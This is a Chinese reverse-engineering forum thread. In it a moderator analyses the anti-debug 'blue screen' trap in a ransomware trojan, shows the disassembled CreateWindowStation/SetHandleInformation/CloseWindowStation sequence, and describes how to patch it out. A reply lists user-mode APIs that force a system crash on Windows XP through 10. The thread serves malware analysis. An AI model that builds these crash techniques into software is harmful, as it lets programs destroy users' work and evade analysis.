吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 32848|回复: 60
上一主题 下一主题
收起左侧

[原创] 浅谈易语言“蓝屏”暗桩查找和处理方法

  [复制链接]
跳转到指定楼层
楼主
Hmily 发表于 2016-7-4 14:45 回帖奖励
现在听说一些易语言写的程序动不动就蓝屏,外挂木马检测到调试器或者虚拟机就蓝屏,一直没有机会遇到没能尝试,恰巧今天有幸遇到一个病毒使用了这个方式,和大家分享一下分析方法,帖子:

恶意木马加密文件又来了,希望管理员密切关注!
http://www.52pojie.cn/thread-511674-1-1.html
(出处: 吾爱破解论坛)

楼下有位同学找到木马的出处,给出了木马解密工具地址:http://disk.680.com/3uUnaa (会检测虚拟机、调试器等,发现就蓝屏)

开始我在虚拟机里打开样本,发现蓝屏了,Godfather.Cr说有检测虚拟机,我就把虚拟机的特征去掉了,继续打开后点击还被蓝屏了,看来还是先去掉蓝屏代码吧,没研究过,怎么找了?

我的思路先去找找蓝屏实现的易语言代码,就搜索到这个:


原来蓝屏实现原理就是先调用CreateWindowStation,然后SetHandleInformation,最后通过CloseWindowStation引发蓝屏。

知道原理后简单多了,直接对CreateWindowStationA下断点,中断后



来自程序的调用,我们回朔到代码段看看(程序加了压缩壳并使用了易语言花指令,自行脱壳去花指令):

[Asm] 纯文本查看 复制代码
00402130    55                 push ebp
00402131    8BEC               mov ebp,esp
00402133    81EC 28000000      sub esp,0x28
00402139    C745 FC 00000000   mov dword ptr ss:[ebp-0x4],0x0
00402140    68 0C000000        push 0xC
00402145    E8 20020100        call dumped_.0041236A
0040214A    83C4 04            add esp,0x4
0040214D    8945 F8            mov dword ptr ss:[ebp-0x8],eax
00402150    8BD8               mov ebx,eax
00402152    C703 00000000      mov dword ptr ds:[ebx],0x0
00402158    C743 04 00000000   mov dword ptr ds:[ebx+0x4],0x0
0040215F    C743 08 00000000   mov dword ptr ds:[ebx+0x8],0x0
00402166    68 18000000        push 0x18
0040216B    E8 FA010100        call dumped_.0041236A
00402170    83C4 04            add esp,0x4
00402173    8945 F4            mov dword ptr ss:[ebp-0xC],eax
00402176    8BF8               mov edi,eax
00402178    BE 161C4A00        mov esi,dumped_.004A1C16
0040217D    AD                 lods dword ptr ds:[esi]
0040217E    AB                 stos dword ptr es:[edi]
0040217F    AD                 lods dword ptr ds:[esi]
00402180    AB                 stos dword ptr es:[edi]
00402181    33C0               xor eax,eax
00402183    B9 04000000        mov ecx,0x4
00402188    F3:AB              rep stos dword ptr es:[edi]
0040218A    8965 F0            mov dword ptr ss:[ebp-0x10],esp
0040218D    90                 nop
0040218E    90                 nop
0040218F    90                 nop
00402190    68 00000000        push 0x0
00402195    68 37000000        push 0x37
0040219A    68 00000000        push 0x0
0040219F    68 A81B4A00        push dumped_.004A1BA8
004021A4    B8 05000000        mov eax,0x5
004021A9    E8 D4010100        call dumped_.00412382                 ; CreateWindowStationA
004021AE    3965 F0            cmp dword ptr ss:[ebp-0x10],esp
004021B1    74 0D              je short dumped_.004021C0
004021B3    68 06000000        push 0x6
004021B8    E8 BF010100        call dumped_.0041237C
004021BD    83C4 04            add esp,0x4
004021C0    8945 EC            mov dword ptr ss:[ebp-0x14],eax
004021C3    90                 nop
004021C4    90                 nop
004021C5    90                 nop
004021C6    8B45 EC            mov eax,dword ptr ss:[ebp-0x14]
004021C9    8945 FC            mov dword ptr ss:[ebp-0x4],eax
004021CC    8965 F0            mov dword ptr ss:[ebp-0x10],esp
004021CF    90                 nop
004021D0    90                 nop
004021D1    90                 nop
004021D2    68 02000000        push 0x2
004021D7    68 02000000        push 0x2
004021DC    FF75 FC            push dword ptr ss:[ebp-0x4]
004021DF    B8 06000000        mov eax,0x6
004021E4    E8 99010100        call dumped_.00412382                 ; SetHandleInformation
004021E9    3965 F0            cmp dword ptr ss:[ebp-0x10],esp
004021EC    74 0D              je short dumped_.004021FB
004021EE    68 06000000        push 0x6
004021F3    E8 84010100        call dumped_.0041237C
004021F8    83C4 04            add esp,0x4
004021FB    8965 F0            mov dword ptr ss:[ebp-0x10],esp
004021FE    90                 nop
004021FF    90                 nop
00402200    90                 nop
00402201    FF75 FC            push dword ptr ss:[ebp-0x4]
00402204    B8 07000000        mov eax,0x7
00402209    E8 74010100        call dumped_.00412382                 ; CloseWindowStation
0040220E    3965 F0            cmp dword ptr ss:[ebp-0x10],esp
00402211    74 0D              je short dumped_.00402220
00402213    68 06000000        push 0x6
00402218    E8 5F010100        call dumped_.0041237C




看到了吧,代码实现流程和上面源码提供的原理相同,那知道代码如果弄了处理方式也简单,提供一些解决蓝屏的方法:
1、我一般喜欢在蓝屏代码的开始直接retn,这里就是00402130 这里retn就好了。
2、3个API随便哪个失败,应该都不会蓝屏,所以下3个断点,中断下来直接到断尾新建EIP返回即可,这个我没验证,你们验证下吧。
3、知道会蓝屏,最好还要把为啥会蓝屏的原因处理下,比如这里有检测虚拟机还有检测调试器等,一并处理掉,这样也不会触发到蓝屏的代码。

最后过了蓝屏后他还会关机,这个比较简单,直接下关机ExitWindowsEx断点就好了。

好了,分享到这里结束,大家也可以探讨一下自己的经验。

点评

版主这是在帮助大家破解【外挂】啊~  发表于 2016-7-4 18:14

免费评分

参与人数 36吾爱币 +2 热心值 +36 收起 理由
zsyhn + 1 + 1 谢谢@Thanks!
yufan1123 + 1 + 1 谢谢@Thanks!
wahx1314 + 1 用心讨论,共获提升!
开心就好啊 + 1 谢谢@Thanks!
zz0147 + 1 我很赞同!
小唯 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
z_geek + 1 我很赞同!
准女婿 + 1 鼓励转贴优秀软件安全工具和文档!
gutian + 1 用心讨论,共获提升!
ZHAGNMEN929 + 1 我很赞同!
hyiok123 + 1 我很赞同!
wuaixuexi + 1 我很赞同!
yeyulang + 1 谢谢@Thanks!
AWEIWEI + 1 H老大 分析得不错
8说了开冲 + 1 我很赞同!
小范 + 1 哇哦,又学习了
jw8013 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
yzh2004 + 1 用心讨论,共获提升!
Lovevivi + 1 鼓励转贴优秀软件安全工具和文档!
天蝎浪花 + 1 学习了,谢谢~也写个蓝屏的程序试试。。
啊飞 + 1 高手一出手就知道有没有
CCW12299 + 1 用心讨论,共获提升!
BY丶显示 + 1 我很赞同!
【=筱筱=】 + 1 用心讨论,共获提升!
刺心 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
KayStrong + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
myweb1996 + 1 我很赞同!
www.52pojie.cn + 1 又见楼主教程!
mumuchow + 1 我很赞同!
spguangz + 1 我很赞同!
~柠萌菇凉~ + 1 我很赞同!
574261766 + 1 学原理,学思路。谢谢大大
keyyan + 1 牛逼的楼主,学习了
勇者为王 + 1 谢谢@Thanks!
三生三世 + 1 已答复!
铅笔刀 + 1 用心讨论,共获提升!

查看全部评分

本帖被以下淘专辑推荐:

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

推荐
nkssrez 发表于 2016-7-4 15:17
本帖最后由 nkssrez 于 2016-7-5 18:26 编辑

我提供几个Ring3可以蓝屏的API  ZwRaiseHardError   RtlSetProcessIsCritical  RtlSetThreadIsCritical   ZwSetInformationProcess ZwSetInformationThread , ZwRaiseHardError 需要Shutdown权限 其他API需要DEBUG权限 只要拿到权限必蓝无疑而且是从XP到WIN10都能用 详情可以看我帖子有源码和成品 http://www.52pojie.cn/forum.php? ... ;page=1#pid12953323

免费评分

参与人数 2热心值 +2 收起 理由
李莹莹 + 1 热心回复!
Hmily + 1 用心讨论,共获提升!

查看全部评分

推荐
勇者为王 发表于 2016-7-4 15:12
4#
 楼主| Hmily 发表于 2016-7-4 14:47 |楼主
【公告】关于最近多位会员被恶意木马加密文件
http://www.52pojie.cn/thread-502278-1-1.html
(出处: 吾爱破解论坛)

自从上一次管理发布这种勒索病毒的分析后,病毒作者再次变种,木马作者一直在其他地方(非吾爱破解论坛)作案,并且加密名称加上我们论坛域名来误导用户,假骗是论坛所为,其实都是木马作者的阴谋。

点评

作者要坑52.没那么容易。  发表于 2016-8-18 02:29

免费评分

参与人数 1热心值 +1 收起 理由
zhengchengliang + 1 我很赞同!

查看全部评分

5#
 楼主| Hmily 发表于 2016-7-4 14:53 |楼主

免费评分

参与人数 1热心值 +1 收起 理由
榻榻米 + 1 感谢您对吾爱破解论坛的支持!

查看全部评分

6#
520_ai_in@sina. 发表于 2016-7-4 14:55
学习一下- -
7#
onmiuncai 发表于 2016-7-4 15:06
感谢H大,学习之。
8#
Cmilyci 发表于 2016-7-4 15:10
涨知识!!  学习到了! 0 0  感谢H大
9#
zt185 发表于 2016-7-4 15:13
学习了,H大牛牛!
10#
学霸 发表于 2016-7-4 15:16
H大分析的要好好看
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-12-21 15:45

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表